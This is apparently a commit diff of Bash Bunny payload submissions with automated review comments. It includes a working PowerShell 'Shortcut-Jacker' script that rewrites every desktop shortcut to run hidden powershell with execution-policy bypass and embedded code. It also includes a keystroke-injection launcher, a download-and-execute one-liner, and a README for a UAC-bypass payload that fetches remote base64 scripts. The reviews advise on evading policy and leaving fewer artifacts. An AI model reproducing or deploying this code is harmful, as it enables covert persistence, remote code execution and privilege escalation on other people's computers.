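Review bot: L16839 says 'Reaplce the URL down below', but nothing in this payload.txt or in the `SafeHaven.txt` it QUACKs (L16875) exposes a URL; the address lives inside the encoded blob on L16809, so a user cannot follow the instruction without regenerating the blob. Either move the URL into a plain, editable line or document the regeneration step. `LED STAGE1` is set twice (L16864, L16872) and the payload never reaches `LED FINISH`; the second should be `STAGE2` with a `FINISH` after the QUACK. Because payload.txt is executed by bash on the Bunny, the `REM` header lines (L16826 to L16844) are run as commands and fail with 'command not found'; the Play-WAV payload in this same commit (L16432) uses `#` comments, which is the library convention. Also, `ATTACKMODE HID STORAGE` (L16859) requests the storage volume but nothing here reads from it; plain `ATTACKMODE HID` enumerates faster and leaves one less artifact on the target.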
@ -0,0 +1,144 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Shortcut+Jacker!+😈¢er=true&size=30">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Shortcut Jacker
|
||||
|
||||
<p align="left">
|
||||
<a href="https://www.youtube.com/watch?v=sOLIdqpzrW4">
|
||||
<img src=https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/SCJ-TV2.png width="300" alt="Python" />
|
||||
</a>
|
||||
<br>YouTube Tutorial
|
||||
</p>
|
||||
|
||||
A script used to embed malware in the shortcut on your targets desktop
|
||||
|
||||
## Description
|
||||
|
||||
This payload will run a powershell script in the background of any shortcut used on the targets desktop
|
||||
|
||||
This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run.
|
||||
|
||||
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run.
|
||||
|
||||
So if your command exceeds that consider using an IWR function to download and execute a longer script.
|
||||
|
||||
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300">
|
||||
|
||||
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/code.jpg" width="900">
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field.
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/shortcut.jpg" width="900">
|
||||
|
||||
## Getting Started
|
||||
|
||||
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file
|
||||
|
||||
### Dependencies
|
||||
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<h2 align="center">📱 My Socials 📱</h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
|
||||
</a>
|
||||
<br>YouTube
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://twitter.com/I_Am_Jakoby">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
|
||||
</a>
|
||||
<br>Twitter
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://discord.gg/MYYER2ZcJF">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
|
||||
</a>
|
||||
<br>Discord
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/bornmay/bornmay/Update/svg/Bottom.svg" alt="Github Stats" />
|
||||
</p>
|
|
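Review bot: the 'Executing program' command at L17085 (`iwr ...; invoke-expression $pl`) does not match the payload.txt in this commit (L17661), which dot-sources `Shortcut-Jacker.ps1` from the Bunny's storage, and 'An internet connection' under Dependencies (L17058) is only needed if the `$code` you embed fetches something, not for the payload itself. Please describe the real flow: edit `$code` in the .ps1, copy it to the switch folder, plug in. The README should also warn that the hijack is not reversible from the payload: each shortcut's original `TargetPath` and `Arguments` are overwritten with powershell.exe (L17595) and no backup is kept, so a tester must record the originals before running this on a machine they care about. Minor: L16973 'embed malware in the shortcut' and L17048 'infected with' overstate what the script does (it rewrites the Target field); L16993 'int the' should be 'in the'.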
@ -0,0 +1,118 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This is payload used to inject powershell code into shortcuts
|
||||
|
||||
.DESCRIPTION
|
||||
This payload will gather information on the shortcuts on your targets desktop
|
||||
That data will then be manipulated to embed a powershell script
|
||||
This script will be ran in the background when the short cut is
|
||||
|
||||
#>
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.NOTES
|
||||
The powershell code stored in this variable is what will run in the background
|
||||
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
|
||||
variable and it will still run.
|
||||
#>
|
||||
|
||||
$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')"
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
function Get-Shortcut {
|
||||
param(
|
||||
$path = $null
|
||||
)
|
||||
|
||||
$obj = New-Object -ComObject WScript.Shell
|
||||
|
||||
if ($path -eq $null) {
|
||||
$pathUser = [System.Environment]::GetFolderPath('StartMenu')
|
||||
$pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')
|
||||
$path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse
|
||||
}
|
||||
if ($path -is [string]) {
|
||||
$path = dir $path -Filter *.lnk
|
||||
}
|
||||
$path | ForEach-Object {
|
||||
if ($_ -is [string]) {
|
||||
$_ = dir $_ -Filter *.lnk
|
||||
}
|
||||
if ($_) {
|
||||
$link = $obj.CreateShortcut($_.FullName)
|
||||
|
||||
$info = @{}
|
||||
$info.Hotkey = $link.Hotkey
|
||||
$info.TargetPath = $link.TargetPath
|
||||
$info.LinkPath = $link.FullName
|
||||
$info.Arguments = $link.Arguments
|
||||
$info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}
|
||||
$info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}
|
||||
$info.WindowStyle = $link.WindowStyle
|
||||
$info.IconLocation = $link.IconLocation
|
||||
|
||||
return $info
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Set-Shortcut {
|
||||
param(
|
||||
[Parameter(ValueFromPipelineByPropertyName=$true)]
|
||||
$LinkPath,
|
||||
$IconLocation,
|
||||
$Arguments,
|
||||
$TargetPath
|
||||
)
|
||||
begin {
|
||||
$shell = New-Object -ComObject WScript.Shell
|
||||
}
|
||||
|
||||
process {
|
||||
$link = $shell.CreateShortcut($LinkPath)
|
||||
|
||||
$PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |
|
||||
Where-Object { $_.key -ne 'LinkPath' } |
|
||||
ForEach-Object { $link.$($_.key) = $_.value }
|
||||
$link.Save()
|
||||
}
|
||||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
function hijack{
|
||||
$Link = $i.LinkPath
|
||||
$Loc = $i.IconLocation
|
||||
$TargetPath = $i.TargetPath
|
||||
if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"}
|
||||
$Target = $i.Target
|
||||
if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
|
||||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
|
|
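Review bot: `hijack` (L17577 to L17598) ignores the argument passed to it at L17608 and reads `$i` from the enclosing scope instead, so the call only works because the variable leaks through dynamic scoping; declare `param($i)` or drop the argument. The rewritten shortcut at L17595 discards the original `$i.Arguments` (a browser shortcut with a profile flag, for example, no longer launches as before) and `Set-Shortcut` never carries `WorkingDirectory`, so targets that rely on a relative working directory break; append `$i.Arguments` after `'$TargetPath'` and copy the working directory as well. `$code` is spliced into the shortcut's argument string unescaped, so any double quote inside it splits the powershell.exe command line the shortcut builds; and given the 924-character limit noted at L17377, a longer `$code` produces a shortcut that silently never runs, so a length check before `Set-Shortcut` would help. `Get-ChildItem –Path` on L17608 uses an en dash; PowerShell tolerates it, but a plain hyphen avoids a copy-paste trap. `.DESCRIPTION` at L17353 ends mid-sentence ('when the short cut is'). Lastly, there is no restore path: writing each shortcut's original `TargetPath` and `Arguments` to a file before the `Set-Shortcut` call would make the payload reversible during an engagement.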
@ -0,0 +1,20 @@
|
|||
REM Title: Shortcut-Jacker
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Shortcut-Jacker.ps1')"
|
||||
QUACK ENTER
|
|
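Review bot: same launcher issue as Play-WAV: L17661 runs `Shortcut-Jacker.ps1` with `-NoP -NonI -W Hidden` but without `-Exec Bypass`, so on a default client (execution policy `Restricted`) the dot-sourced script is refused; the shortcuts this script writes already use `-Exec Bypass` (L17595), so the launcher should too. The `REM` lines at L17614 to L17629 are executed by bash and fail with 'command not found' because payload.txt is a bash script; use `#` as Play-WAV's payload.txt does (L16432). There is no `LED SETUP` before `ATTACKMODE` (L17639) and no `LED FINISH` after `QUACK ENTER` (L17664), so the operator gets no end-of-run signal.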
@ -0,0 +1,104 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# UrAttaControl
|
||||
|
||||
A script used to open an elevated powershell console and execute admin level commands
|
||||
|
||||
## Description
|
||||
|
||||
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
|
||||
|
||||
This script will use IEX to download a base64 script to the $Payload variable
|
||||
|
||||
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
|
||||
|
||||
script saved in the $Payload variable
|
||||
|
||||
This payload completely bypasses the UAC and will run any admin level script without a prompt
|
||||
|
||||
You can use this function I wrote to convert your .ps1 sscripts to Base64
|
||||
|
||||
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* A keystroke injection based payload will run
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
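Review bot: the Description (L17728 to L17748) refers to 'the execute file' and a URL to replace, but the files in this commit are `payload.txt` and `SafeHaven.txt`, and neither shows a URL (it is inside the encoded blob on L16809); the README should name the file, show where the URL goes, and document how to regenerate the blob after editing it. L17733 says IEX downloads the script; `Invoke-Expression` only evaluates a string, so the download must come from `Invoke-WebRequest` or similar, and the sentence should say which. L17748 'completely bypasses the UAC and will run any admin level script without a prompt' needs the qualifier that the logged-on user must already be a local administrator; a UAC bypass elevates an admin's medium-integrity token, it does not grant rights a standard user lacks. The bundled `SafeHaven.txt` (L16762) describes creating a Defender-excluded folder, which is a narrower purpose than 'run any script'; state which behaviour the shipped blob actually has. Typos: L17753 'sscripts'; L17907 `Project Link:` opens with `[` and closes with `)`.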